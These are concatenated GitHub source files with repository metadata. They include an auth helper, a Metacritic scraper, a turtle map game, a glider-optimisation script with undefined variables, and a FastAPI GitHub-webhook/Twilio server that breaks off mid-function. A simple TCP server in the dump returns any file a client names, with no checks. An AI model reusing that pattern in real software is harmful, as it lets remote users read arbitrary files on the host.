json.loads(r.text)\n self.display_name = info.get(\"displayName\", \"\")\n self.emails = [email[\"value\"] for email in info.get(\"emails\")]\n\n def is_authorized(self, user_view):\n \"\"\"Checks that the user is actually authorised to use genomics-status.\"\"\"\n authenticated = False\n for email in self.emails:\n if user_view[email]:\n self.valid_email = email\n authenticated = True\n return authenticated\n","repo_name":"SciLifeLab/genomics-status","sub_path":"status/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"22347999909","text":"from csv import DictReader\nfrom os import path\n\nfolder = path.dirname(path.abspath(__file__))\n\nwith open(path.join(folder, 'anagrams.csv'), newline='') as file:\n answers = list(map(lambda row: {\n 'answer': row['answer'],\n 'category': row['category'],\n 'subcategory': row['subcategory']\n }, DictReader(file)))\n","repo_name":"TypeError92/nc-final-project-data","sub_path":"db/data/dev/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8155489972","text":"'''\n\n정다면체\n\n4 6\n*풀이법\n나올 수 있는 눈의 합에 대한 cnt list를 만들고 나올 때마다 cnt add해줌\n'''\n\nn, m = map(int, input().split())\n\ncnt = [0] * (n+m+3)\nfor i in range(1, n+1):\n for j in range(1, m+1):\n cnt[i+j] += 1\n\n#max 값 구하기\nmaxCnt = 0\nfor i in range(n+m+1):\n if cnt[i] > maxCnt:\n maxCnt = cnt[i]\n\n#value가 max값인 index 리턴하기\nfor i in range(n+m+1):\n if cnt[i] == maxCnt:\n print(i, end=\" \")\n","repo_name":"joorani/Algorithm","sub_path":"강의/chapter2/2-5.py","file_name":"2-5.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42457094961","text":"from socket import *\n\nhost = '142.55.107.217' #Server IP address\n\nport = 5555 #This port will be bound in server\nbacklog = 5 #The backlog is the maximum number of queued connections\nsize = 1480\n\nlistensock = socket(AF_INET,SOCK_STREAM)\nlistensock.bind((host,port))\nlistensock.listen(backlog)\nservercloseflag = False\n\nwhile not servercloseflag:\n \tprint('Waiting for client connection...')\n \tclientsock, clientaddress = listensock.accept()\n \tprint('Recieved connection from :', \n \t\t\tclientaddress[0], \n \t\t\t'on port: ',\n\t\t\tclientaddress[1])\n \trecdata = clientsock.recv(size) #Receieved data of byte type\n \t\n \tfile_name = recdata.decode()\n \tfile_data = \"\"\n \tfiles = open(file_name)\n \tfor line in files:\n \t\tfile_data = file_data + (line) + '\\n'\n\n\n \twhile recdata:\n \t\tprint('Received data from ', clientaddress[0], ': ',recdata.decode())\n \t\tclientsock.send(file_data.encode()) #echo back (test only)\n \t\trecdata= clientsock.recv(size)\n \n \t\tif recdata.decode() == 'end' or recdata.decode() == 'quit': #close client first\n \t\t\tprint('Closing connection with ', clientaddress[0])\n \t\t\tclientsock.close()\n \t\t\tbreak\n \n \tif recdata.decode() == 'quit': #Close server\n \t\tservercloseflag = True\n\nprint('Closing server:')\nlistensock.close()\nprint('Bye...')\n\n","repo_name":"charlesjavelona/server-client","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42185084802","text":"#In this program, it is assumed that a pilot change alpha only twice.\n#For the first time, he changes alpha from 0 degrees\n#to something, And for the second time,he changes it from something to 0 degrees.\n#\n#optimize with respect to t1, t2, and alpha.\n#we chose Gradient descent as an algorithm.\n#\n\nimport param\nfrom flight_simulator import *\nfrom file_func import *\n\n\ndt = 0.05\nt_list = np.arange(0, 15, dt)\n\n#objective function\ndef obj_func(t1, t2, alpha):\n alpha_list = np.zeros(len(t_list))\n for i in range(len(t_list)):\n if (t_list[i]t2):\n continue;\n \n alpha_list[i] = alpha\n \n state_list = runge_kutta(param.STATE0, dt, t_list, alpha_list)\n return 1 # To be implemented\n \n#derivative function of objective function\ndef grad_obj_func1(t1, t2, alpha):\n result_list = np.zeros(3)\n\n result_list[0] = (obj_func(t1+dt, t2, alpha) - obj_func(t1-dt, t2, alpha))/(2*dt)\n result_list[1] = (obj_func(t1, t2+dt, alpha) - obj_func(t1, t2-dt, alpha))/(2*dt)\n result_list[2] = (obj_func(t1, t2, alpha+0.3) - obj_func(t1, t2, alpha-0.3))/(2*dt)\n \n return result_list\n\n\n#calculate norm**2 of vec\ndef calc_norm2(vec):\n norm2 = 0\n for x in vec:\n norm2 += x**2\n return norm2\n\n#backtracking\n#n is number of variables to be optimized\ndef cal_step_size(t1, t2, alpha):\n step_size = 1 #initial step size\n xi = 0.0001\n rho = 0.8 #To be reviewd\n grd = grad_obj_func1(t1, t2, alpha)\n \n norm2 = calc_norm2(grd)\n \n #use Armijo condition\n while (obj_func(t1+grd[0], t2+grd[1], alpha+grd[2]) > obj_func(t1, t2, alpha) + xi*step_size*norm2):\n step_size *= rho\n \n return step_size\n\n \ndef main():\n alpha = radians(5)\n t1 = 3\n t2 = 8\n epsilon = 3*0.000001\n \n #optimization\n for i in range(100):\n grd = grad_obj_func1(t1, t2, alpha)\n if (calc_norm2(grd) <= epsilon**2):\n print(\"Find best operation!\")\n break;\n\n var_list += calc_step_size(t1, t2, alpha)*grd\n\n print(\"Cost is\", obj_func(t1, t2, alpha))\n\n alpha_list = np.zeros(len(t_list))\n for i in range(len(t_list)):\n if (t_list[i]t2):\n continue;\n \n alpha_list[i] = alpha\n \n \n state_list = runge_kutta(param.STATE0,dt,t_list,alpha_list)\n plot_state_list(state_list)\n store_trajectory(t_list,state_list,alpha_list,'./data/best_operation_every_alpha.csv')\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"BirdmanTeamShootingStars/FlightSimulator","sub_path":"optimization_2_alpha.py","file_name":"optimization_2_alpha.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73028740703","text":"# coding: utf-8\nimport numpy as np\nimport AI_debug\nfrom tf_model import load_existing_model\n\nboard_size=15\ndef read_board_state(f):\n # default\n black_stones = set()\n white_stones = set()\n board = [black_stones, white_stones]\n last_move = None\n playing = 0\n # read and parse board\n for line in open(f):\n if '|' in line:\n line_idx, contents = line.split('|', maxsplit=1)\n row_i = int(line_idx) - 1\n ls = contents.split()\n if len(ls) == board_size:\n for col_j, s in enumerate(ls):\n stone = (row_i+1, col_j+1)\n if s == 'x':\n black_stones.add(stone)\n elif s == 'X':\n black_stones.add(stone)\n last_move = stone\n playing = 1\n elif s == 'o':\n white_stones.add(stone)\n elif s == 'O':\n white_stones.add(stone)\n last_move = stone\n playing = 0\n elif s == '-':\n pass\n else:\n print(f'found unknown stone: {s}')\n board_state = [board, last_move, playing, board_size]\n return board_state\n\nboard_state = read_board_state('debug_board.txt')\n\n\nmodel = load_existing_model('tf_model.h5')\nAI_debug.tf_predict_u.model = model\nAI_debug.initialize() \n\nprint(AI_debug.strategy(board_state))\n","repo_name":"yudongqiu/gomoku","sub_path":"swap_start/auto_playok_com/debug/debug_state.py","file_name":"debug_state.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"40450839254","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 10:29:42 2017\n\n@author: abyss\n\"\"\"\n\ndef valid_yesno(entry):\n yes = {'yes','y', 'ye'}\n no = {'no','n',''} \n if entry in yes:\n return True\n elif entry in no:\n return False\n else : \n print (\"Layer 8 issue, skipping\")\n return False \n\ndef doyouwant(whattodo):\n entry=input(\"Do you want to \"+whattodo+\"? (y/N)\").lower() \n if valid_yesno(entry) is True :\n return True\n","repo_name":"AbyssAndromalius/HardeningLinux","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22762652798","text":"from django.contrib import admin\n\n# Register your models here.\nfrom apps.notice.models import Notice\n\n\n@admin.register(Notice)\nclass NoticeAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'title',\n 'user',\n 'date_created'\n )\n\n list_display_links = (\n 'id',\n 'user',\n )\n","repo_name":"nawarazpokhrel/gces_backend","sub_path":"apps/notice/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28526932658","text":"import time\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n# hardcode metacritic url with !NO page number\nmetacritic_url = 'https://www.metacritic.com/browse/games/genre/userscore/real-time/all?view=condensed&page='\nuser_agent = {'User-agent': 'Mozilla/5.0'}\n\n# data set for collected data\nmetacritic_data = {'name': [], 'date': [], 'platform': [], 'score': [], 'reviewCount': [],\n 'style': [], 'developer': [], 'downloads': []}\n\n\n# method to get data for BeautifulSoup\ndef get_page_content(url):\n page = requests.get(url, headers=user_agent)\n return BeautifulSoup(page.text, 'html.parser')\n\n\n# method to add data in dataset from first to selected pages\ndef scrapDataFromMetacritic(endPage):\n current_page = 0\n while current_page < endPage:\n url = metacritic_url + str(current_page)\n\n # Getting data for further parse\n soup = get_page_content(url)\n\n # Parse web-page to find all game names\n for a in soup.find_all('a', {'class': 'title'}):\n for h3 in a.find_all('h3'):\n name = h3.get_text().strip()\n metacritic_data['name'].append(name)\n\n # Parse web-page to find all release dates and platforms (in same cycle because in same 'td')\n for td in soup.find_all('td', {'class', 'details'}):\n # Get game release date\n for date_span in td.find_all('span', {'class': ''}):\n date = date_span.get_text().strip()\n metacritic_data['date'].append(date)\n # Get game platform\n for platform_span in td.find_all('span', {'class': 'data'}):\n platform = platform_span.get_text().strip()\n metacritic_data['platform'].append(platform)\n\n # Parse web-page to find all user scores\n for meta_score in soup.find_all('div', {'class': 'metascore_w user large game positive'}):\n score = meta_score.get_text().strip()\n metacritic_data['score'].append(score)\n\n # Move to game page to extract review count, developer and style\n for gamePage in soup.find_all('a', {'class': 'title'}):\n new_url = 'https://www.metacritic.com' + gamePage['href']\n new_page = requests.get(new_url, headers=user_agent)\n new_soup = BeautifulSoup(new_page.text, 'html.parser')\n # Find and scrap review count\n for review_span in new_soup.find_all(name='a',\n attrs={'href': gamePage['href'] + '/user-reviews', 'class': ''},\n limit=1):\n review_count = re.findall(r'\\d+', review_span.get_text().strip())\n metacritic_data['reviewCount'].append(review_count.pop())\n # Find and crap developer\n for developer_span in new_soup.find_all(name='a',\n href=True,\n attrs={'class': 'button'},\n limit=1):\n metacritic_data['developer'].append(developer_span.get_text().strip())\n # Find and scrap style\n parent = new_soup.findChildren('li', {'class': 'summary_detail product_genre'})\n for child in parent:\n text = hyphen_split(child.text)\n metacritic_data['style'].append(text)\n\n # wait some time to not get banned\n time.sleep(6)\n current_page += 1 # transfer to next page\n return metacritic_data\n\n\n# Method to split style text\ndef hyphen_split(a):\n split_text_list = a.split(',')\n return split_text_list[2].strip()\n\n\n# Save result dictionary to csv file\ndef createDataFrame():\n game = pd.DataFrame.from_dict(metacritic_data, orient='index')\n games = game.transpose()\n games.to_csv('games_list.csv', index=False, header=True, mode='w')\n","repo_name":"PashokSy/retrostylegames_tt","sub_path":"MetacriticScrapper.py","file_name":"MetacriticScrapper.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36596965026","text":"import turtle\nimport pandas\n\nturtle.screensize(514, 941, bg=\"light blue\")\nscreen = turtle.Screen()\nscreen.title(\"Israel map Game\")\nscreen.setup(width=0.9, height=0.9)\n\n# image is gif because Turtle can read images just in this way\nimage = \"Israel_relief_location_map.gif\"\n\n# to add backround image\nscreen.addshape(image)\nturtle.shape(image)\n\n# collect the data from csv file\ndata_tribes = pandas.read_csv(\"tribes_name.csv\")\n# collecting from data all the states and converting them to list\nall_tribes = data_tribes.tribe.to_list()\n\n\n# def get_mouse_click_coor(x, y):\n# print(x, y)\n#\n# # that's will listen when the mouse clicks and it will call our get_mouse_click_coor and pass over x and y coordinate\n# turtle.onscreenclick(get_mouse_click_coor)\n\nguessed_tribes = []\n\nwhile len(guessed_tribes) < 12:\n answer_tribe = screen.textinput(title=f\"{len(guessed_tribes)}/12 tribes Correct\",\n prompt=\"What's another tribes name?\").title()\n\n # if the user wrote exit it will end the game and save the results in csv file\n if answer_tribe == \"Exit\":\n missing_tribes= []\n for tribe in all_tribes:\n if tribe not in guessed_tribes:\n missing_tribes.append(tribe)\n new_data = pandas.DataFrame(missing_tribes)\n new_data.to_csv(\"tribes_to_learn.csv\")\n break\n\n # If answer_state is one of the states in all states of the 50_states.csv\n if answer_tribe in all_tribes:\n guessed_tribes.append(answer_tribe)\n # If they got it right:\n # Create a Turtle to write the name of the state at the state's x and y coordnate\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n # if data.state equal to answer_state\n # write the name of the state at the state's x and y coordnate\n tribe_data = data_tribes[data_tribes.tribe == answer_tribe]\n t.goto(int(tribe_data.x), int(tribe_data.y))\n t.write(tribe_data.tribe.item())\n\n\n# screen.mainloop()\n","repo_name":"AdiMakeItHappens/Israel-tribes-location-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72685520544","text":"from typing import List\n\n\"\"\"\nInput:\ns = \"catsanddog\"\nwordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n\nOutput:\n[\n \"cats and dog\",\n \"cat sand dog\"\n]\n\"\"\"\n\n\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> List[str]:\n\n answer = []\n\n def dfs(string: str, curr_words: List[str]):\n if not string:\n answer.append(' '.join(curr_words))\n return\n\n for word in wordDict:\n # if string[:len(word)] == word:\n if string.startswith(word):\n dfs(string[len(word):], curr_words + [word])\n\n dfs(s, [])\n return answer\n\n\n# TLE\n# \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n# [\"a\",\"aa\",\"aaa\",\"aaaa\",\"aaaaa\",\"aaaaaa\",\"aaaaaaa\",\"aaaaaaaa\",\"aaaaaaaaa\",\"aaaaaaaaaa\"]\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/String/WordBreakII/Backtracking140.py","file_name":"Backtracking140.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"31400234583","text":"files = []\nfor _ in range(int(input())):\n files.append(input().strip())\n\nfor file in files:\n f_input = open(file, 'rt', encoding='utf-8')\n f_output = open('output.txt', 'a', encoding='utf-8')\n for line in f_input:\n f_output.write(line)\n f_input.close()\n f_output.close()\n","repo_name":"Jlexa46/stepikPyAdvanced","sub_path":"Lesson_17/Lesson_17.4/Task_17.4f.py","file_name":"Task_17.4f.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25964481784","text":"from haversine import haversine\nimport plotly.express as px\nimport plotly.graph_objects as go\n\nimport pandas as pd\nimport numpy as np\nimport streamlit as st\nfrom PIL import Image\nfrom streamlit_folium import folium_static\nimport folium\nfrom folium.plugins import MarkerCluster\n\n\n#df_raw = pd.read_csv('zomato_1.csv', encoding='ISO-8859-1')\n\n#from google.colab import drive\n\n#drive.mount('/content/drive')\n#df_raw = pd.read_csv('dataset/zomato_1.csv', encoding=\"ISO-8859-1\")\ndf_raw = pd.read_csv('dataset/zomato_1.csv', encoding='utf-8')\n\n\ndf = df_raw.copy()\n\n# ===================================================================\n\n#Separando os tipos de culinária em restaurantes que possuem mais de uma:\n\n\ndf['Cuisines'] = df.loc[:, 'Cuisines'].apply(lambda x: str(x).split(\",\")[0])\n\n# Criando uma coluna com o nome dos países baseado em código.\n\ndf['Country name'] = df['Country Code'].replace({\n 1: \"India\",\n 14: \"Australia\",\n 30: \"Brazil\",\n 37: \"Canada\",\n 94: \"Indonesia\",\n 148: \"New Zeland\",\n 162: \"Philippines\",\n 166: \"Qatar\",\n 184: \"Singapure\",\n 189: \"South Africa\",\n 191: \"Sri Lanka\",\n 208: \"Turkey\",\n 214: \"United Arab Emirates\",\n 215: \"England\",\n 216: \"United States of America\",\n})\n\n# Criando uma coluna Categorizando Comidas com base em seus price range\n\n\ndf['Price Type'] = df['Price range'].replace({\n 1: \"cheap\",\n 2: \"normal\",\n 3: \"expensive\",\n 4: \"gourmet\",\n})\n\n# Criando uma coluna com o nome das cores baseado em código de cor.\n\n\ndf['Colors'] = df['Rating color'].replace({\n '3F7E00': \"darkgreen\",\n '5BA829':\"green\",\n '9ACD32': \"lightgreen\",\n 'CDD614': \"orange\",\n 'FFBA00': \"red\",\n 'CBCBC8': \"darkred\",\n 'FF7800': \"darkred\",\n\n})\n\ndef rename_columns(dataframe):\n df = dataframe.copy()\n title = lambda x: inflection.titleize (x)\n snakecase = lambda x: inflection.underscore (x)\n spaces = lambda x: x.replace(\" \", \"\")\n cols_old = list(df.columns)\n cols_old = list(map(title, cols_old))\n cols_old = list(map(spaces, cols_old))\n cols_old = list(map(snakecase, cols_old))\n df.columns = cols_new\n\n return df\n\n# Barra Lateral\n\n#----------------------\n#Barra Lateral\n#--------------------------\nst.header( 'Informações sobre culinárias' )\nimage_path = 'logo_zomato1.png'\nimage = Image.open('zomato_logo.jpg')\nst.sidebar.image( image, width=120 )\n\n\nst.sidebar.title( '' )\nst.sidebar.markdown( '## Filtro ' )\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\nst.sidebar.markdown( '## Seleção de países por exclusão')\n\ncountry_options = st.sidebar.multiselect(\n 'Quais países?',\n ['India','Australia','Brazil','Canada','Indonesia',\"New Zeland\",\"Philippines\",\"Qatar\",\"Singapure\",\"South Africa\",\"Sri Lanka\",\"Turkey\",\"United Arab Emirates\",\"England\",\"United States of America\"],\n default= ['India','Australia','Brazil','Canada','Indonesia',\"New Zeland\",\"Philippines\",\"Qatar\",\"Singapure\",\"South Africa\",\"Sri Lanka\",\"Turkey\",\"United Arab Emirates\",\"England\",\"United States of America\"] )\n\nst.sidebar.markdown(\"\"\"___\"\"\")\n\n#Filtro de país\nlinhas_selecionadas = df['Country name'].isin(country_options)\ndf = df.loc[linhas_selecionadas, :]\n\n#-------------------------------------------------------------------\n\n# contagem de quantas culinárias totais\n# gráfico com cuinárias mais presentes\n\n# ----------------------------------------------------------\n# top italiano\n# top árabe\n# top japones\n\n#--------------------------------------\n\n# gráfico com culinárias que mais fazem entregas\n#---------------------------------------------------------------\nwith st.container():\n st.markdown(\"\"\"___\"\"\")\n st.subheader( 'Avaliações médias de culinárias' )\n\ncol1, col2, col3, col4 = st.columns( 4 )\nwith col1:\n # st.subheader( 'Quantidade total de culinárias')\n\n df_aux1 = df.loc[:,'Cuisines'].nunique()\n \n col1.metric('Variedade de culinárias',df_aux1)\n\nwith col2:\n \n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(4.00, 10.00)].count()\n \n \n col2.metric('Avaliações acima de 4.0',df_aux)\n \n \nwith col3:\n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(3.00, 3.99)].count()\n \n \n col3.metric('Entre 3.0 e 4.0',df_aux)\n \nwith col4:\n \n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(0.00, 2.99)].count()\n \n \n col4.metric('Abaixo de 3.0',df_aux)\n\n \n\n\n#------------------------------------------------------------------\n\nwith st.container():\n \n st.markdown('## 20 Culinárias mais comuns')\n \n\n\n df_aux = df.loc[:, ['Cuisines','Country name']].groupby('Cuisines').count().sort_values(['Country name'], ascending=False).head(20)\n\n df_aux = df_aux.reset_index()\n\n fig = px.bar(df_aux, x= 'Cuisines', y= 'Country name')\n\n #fig.show()\n\n st.plotly_chart( fig, use_container_width=True )\n\n\n\n#------------------------------------------------------------------\n\nwith st.container():\n\n\n st.markdown(\"\"\"___\"\"\") \n\n st.subheader( 'Culinárias dos restaurantes que mais fazem entregas online')\n\n df_online1 = df[df['Has Online delivery'].isin([1])]\n\n df_online1_delivery1 = df_online1[df_online1['Is delivering now'].isin([1])]\n\n df_aux1 = (df_online1_delivery1.loc[: , ['Restaurant Name', 'Cuisines']].groupby('Cuisines').count().sort_values('Restaurant Name', ascending=False)).head(10)\n \n df_aux1 = df_aux1.reset_index()\n \n fig = px.bar(df_aux1, x= 'Cuisines' , y= 'Restaurant Name')\n \n st.plotly_chart( fig, use_container_width=True )\n\n#-------------------------------------------------------------------\n \n st.subheader( 'Fast Foods mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Fast Food')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n \n #------------------------------\n \n \n st.subheader( 'Restaurantes de culinária brasileira mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Brazilian')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #-----------------------------------------------------------------\n \n \n\n # --------------------------------------------------\n \n st.subheader( 'Restaurantes de culinária italiana mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Italian')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #---------------------------------------------------------------\n \n st.subheader( 'Restaurantes de culinária japonesa mais bem avaliados e seus respectivos países')\n\n\n \n df_c = df[df['Cuisines'] == ('Japanese')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #-----------------------------------------------------------------------\n \n\n \n","repo_name":"caiomont96/caio_mont_zomato_1","sub_path":"pages/3_cuinarias.py","file_name":"3_cuinarias.py","file_ext":"py","file_size_in_byte":8259,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36697366441","text":"# python imports\nfrom fastapi import FastAPI, Request\nfrom urllib import request\nfrom src.base_models import *\nimport requests\nimport uuid\nimport json\nimport os\n\n# internal imports\nfrom src.relay.relay import relay_\nfrom src.phone_numbers import NUMBERS\nfrom src.twilio_client import sendMessage\nfrom src.parse_webhook import *\n\n#postgres server\nfrom src.postgres.models import User, Task, TodoList, Idea\nfrom src.postgres.crud import Backend_Interface\n\n# startup\napp = FastAPI()\ninterface = Backend_Interface()\n\ndo_all_texts = False\n\n####### ROUTES [Basic] #######\n\n\n@app.get(\"/ping\", status_code=200)\nasync def ping():\n return {\"message\": \"pong\"} \n\n\n####### ROUTES [MAIN] #######\n\n\n@app.post(\"/relay\", status_code=200)\nasync def _relay(request: RelayRequest):\n try:\n response = relay_(request.endpoint, request.method, request.oauth_token)\n return {\"message\": \"success\", \"response\": response.content}\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n \n# post github data (testing)\n@app.post(\"/data\", status_code=200)\nasync def scrape_(request: OauthPostRequest):\n return request\n\n# recieve data from github\n@app.post(\"/webhook\", status_code=200)\nasync def webhook(request: Request):\n \n body_data = await request.json()\n\n # univeral data\n repo = body_data['repository']['name']\n sender = body_data['sender']['login']\n\n try:\n phone = interface.get_user(sender)[3]\n except:\n phone = None\n \n if 'check_run' in body_data:\n body = parse_check_run(body_data)\n if 'head_commit' in body_data:\n body = parse_push(body_data)\n if 'issue' in body_data:\n body = parse_issue(body_data)\n\n else:\n body = None\n\n if body is not None: \n \n if phone is None:\n \n for number in NUMBERS:\n sendMessage(body, number)\n \n else:\n sendMessage(body, phone)\n sendMessage(\"sent\", NUMBERS[0])\n \n else:\n if do_all_texts:\n for number in NUMBERS:\n keys = []\n for key in body_data:\n keys.append(key)\n sendMessage(f\"not a relevant update to {repo}: {keys}\", number)\n \n# create sign up \n@app.post(\"/addUser\", status_code=200)\nasync def addUser(request: AddUserRequest):\n # add user to database\n \n # if oauth exists return user coresponding to oauth.\n \n\n headers = {\n \"Authorization\": f\"token {request.oauth_token}\",\n }\n\n r = requests.get(\"https://api.github.com/user\", headers=headers)\n \n data_dict = r.json()\n\n username = data_dict['login']\n email = data_dict['email']\n name = data_dict['name']\n \n user = User(username, email, request.phone_number, name, request.oauth_token)\n\n try:\n id = interface.create_user(user)\n return {\"id\": id, \"username\": username, \"email\": email, \"phone\": request.phone_number, \"name\": name, \"github_oauth_token\": request.oauth_token}\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n\n# sign in \n@app.post(\"/signIn\", status_code=200)\nasync def signIn(request: LoginRequest):\n # if oauth exists return user coresponding to oauth.\n\n user = interface.fetch_user_by_oauth(request.oauth_token)\n if user is None:\n return {\"message\": \"user does not exist\"}\n else:\n \n id = user[0]\n username = user[1]\n email = user[2]\n phone = user[3]\n name = user[4]\n github_oauth_token = user[5]\n\n return {\"id\": id, \"username\": username, \"email\": email, \"phone\": phone, \"name\": name, \"github_oauth_token\": github_oauth_token}\n\n#twilio config\n@app.get(\"/changetextsettings\", status_code=200)\nasync def changeTextSettings():\n global do_all_texts\n do_all_texts = not do_all_texts\n return {\"message\": f\"text settings changed to {do_all_texts}\"}\n\n\n@app.post(\"/addTask\", status_code=200)\nasync def addTask(request: AddTaskRequest):\n try:\n user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n if type(user_id) is not int:\n raise Exception(\"USER_ID WRONG TPYE YOU BUM in addTask\")\n\n task = Task(request.task_name, False, request.task_description, user_id)\n interface.create_task(task)\n return {\"message\": \"success\"}\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/getTasks\", status_code=200)\nasync def getTasks(request: GetTasksRequest):\n try:\n #oauth_token \n tasks = interface.fetch_task_by_todo_list_id(request.todo_list_id)\n return {\"tasks\": tasks}\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/addWebhook\", status_code=200)\nasync def addWebhook(request: AddWebhookRequest):\n repo = request.repo\n user = interface.fetch_user_by_oauth(request.oauth_token)\n \n if user is None:\n return {\"message\": \"user does not exist\"}\n\n username = user[1]\n\n URL = f\"https://api.github.com/repos/{username}/{repo}/hooks\"\n\n headers = {\n \"accept\": \"application/vnd.github.v3+json\",\n \"Authorization\": f\"token {request.oauth_token}\",\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n data = \"{\\\"name\\\":\\\"web\\\",\\\"active\\\":true,\\\"events\\\":[\\\"push\\\",\\\"pull_request\\\",\\\"check_run\\\",\\\"issues\\\"],\\\"config\\\":{\\\"url\\\":\\\"https://devverse-server.herokuapp.com/webhook\\\",\\\"content_type\\\":\\\"json\\\",\\\"insecure_ssl\\\":\\\"0\\\"}}\"\n\n response = requests.post(URL, data=data, headers=headers)\n\n return {\"message\": \"success\", \"response\": response.json()}\n \n\n# idea models\n\n\n@app.post(\"/addIdea\", status_code=200)\nasync def addIdea(request: AddIdeaRequest):\n try:\n user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n if type(user_id) is not int:\n raise Exception(\"USER_ID WRONG TPYE YOU BUM in addIdea\")\n idea = Idea(request.idea_name, request.idea_description, user_id, False)\n interface.create_idea(idea)\n return {\"message\": \"success\"}\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/viewIdeas\", status_code=200)\nasync def viewIdeas(request: ViewIdeasRequest):\n try:\n #user id from oauth\n user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n ideas = interface.fetch_ideas_by_user_id(user_id)\n\n ideas = [{\"id\": x[0], \"name\": x[1], \"description\": x[2], \"user_id\": x[3], \"completed\": x[4]} for x in ideas]\n\n\n return ideas\n except Exception as e:\n return {\"message\": \"error\", \"exception\" : str(e)}\n\n\n@app.post(\"/editIdea\", status_code=200)\nasync def editIdea(request: EditIdeaRequest):\n try:\n idea = Idea(request.idea_name, request.idea_description, request.user_id, request.idea_completed)\n 